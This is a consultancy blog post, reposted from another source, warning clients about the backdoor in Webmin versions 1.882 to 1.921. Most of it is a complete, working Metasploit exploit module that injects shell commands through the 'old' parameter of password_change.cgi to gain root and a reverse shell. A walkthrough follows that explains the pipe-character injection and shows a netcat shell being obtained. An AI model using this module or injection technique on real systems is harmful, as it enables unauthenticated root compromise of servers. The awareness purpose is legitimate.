The original articles can be found here and here.

It seems like it is the season for vulnerabilities of different kinds.

GTconsult recently got wind of a vulnerability that it feels that clients need to be aware of. The following article was taken from this blog and was not originally produced by GTconsult.

What you need to know.

The vulnerability was secretly planted by an unknown hacker who successfully managed to inject a BACKDOOR at some point in its build infrastructure that surprisingly persisted into various releases of Webmin (1.882 through 1.921) and eventually remained hidden for over a year.

Developers confirmed that the official Webmin downloads were replaced by the backdoored packages only on the project’s SourceForge repository, and not on the Webmin’s Github repositories.

This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin 1.882 <= 1921 Unauthenticated RCE', 'Description' => %q( This module exploits an arbitrary command execution vulnerability in Webmin 1.920 and prior versions. If the password change module is turned on, the unathenticated user can execute arbitrary commands with root privileges. Webmin 1.890 is vulnerable in the default configuration, while the other affected versions require the “user password change” option to be enabled. /////// This 0day has been published at DEFCON-AppSec Village. /////// ), 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-'], ['URL', 'https://www.pentest.com.tr'] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd' } }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_python' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Webmin <= 1.910', {}]], 'DisclosureDate' => 'May 16 2019', 'DefaultTarget' => 0) ) register_options [ OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) ] end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end ## # Target and input verification ## def check # check passwd change priv res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "password_change.cgi"), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1" }) if res && res.code == 200 && res.body =~ /Failed/ res = send_request_cgi( { 'method' => 'POST', 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss" }) if res && res.code == 200 && res.body =~ /password_change.cgi/ return CheckCode::Vulnerable else return CheckCode::Safe end else return CheckCode::Safe end end ## # Exploiting phase ## def exploit unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end command = payload.encoded print_status("Attempting to execute the payload...") handler res = send_request_cgi( { 'method' => 'POST', 'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'password_change.cgi'), 'headers' => { 'Referer' => "#{peer}/session_login.cgi" }, 'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss" }) end end

In webmin, the “user password change” must be allowed for the exploit vulnerability. this is the only condition. Many webmin managers enable this feature. They allows users to set a new password with the old password. Let’s take a closer look at this.

Webmin 1.890 is vulnerable in the default configuration, while the other affected versions require the “user password change” option to be enabled.

While researching on the Webmin application, I noticed some interesting “.cgi” files. One of them is “password_change.cgi”

There is only one requirement for the parameters in this file to work, that the “passwd_mode” value in the “miniserv.conf” configuration file is set to “2”.

<code class="hljs php"><span class="cp">$miniserv{<span class="hljs-string">'passwd_mode'</span>} == <span class="hljs-number">2</span> || <span class="hljs-keyword">die</span><span class="hljs-string">"Password changing is not enabled!"</span>;</span>

So how does the administrator activate this configuration? let’s check…

In the “Webmin> Webmin Configuration> Authentication” section, “Prompt users with expired passwords to enter a new one” should be checked. This means a value of “2” for “password_change” in “miniserv.conf”.

After this configuration, users can change their expired password by verifying their old password.

So where exactly is the vulnerability? Let’s back to “password_change.cgi”.

“password_change.cgi” sends the old password to “encrypt_password” function in “acl/acl-lib.pl”

This function calls the other function “unix_crypt”.

In another section, the same function “unix_crypt” is called again for “Validate old password”.

At this point, we will use “vertical bar (|)” by reading the shadow file during validating the old password.

Let’s look at this by sending a request with the burp suite.

We sent a request with an ordinary “POST” data, and naturally gave an error “Failed to change password: The current password is incorrect”.

The vulnerability is exactly included in the “old” parameter.

It doesn’t matter if the username, old password or other information is correct.

The file “password_change.cgi” will check the information in the “old” parameter on the server. It won’t even check if the username is correct or not.

we will now use “vertical bar (|)” and try to run a different command on the server.

As you can see, the command “ifconfig” is executed by the server and the output is shown.

Now let’s send a malicious payload to the server and receive shell session.

I’ll use “netcat” payload for proof. Because I know there is netcat on the server.

As you can see the shell was received. When we run the command “pwd”, we can see that the malicious payload is executed in the “acl” folder. Because the function is called here.

The webmin backdoor is a serious vulnerability that you need to be aware of. We know that it may be difficult to fix on your own so if you run into any issues or if you cannot fix it on your own, contact our A Team and let us help you enable your productivity in your business.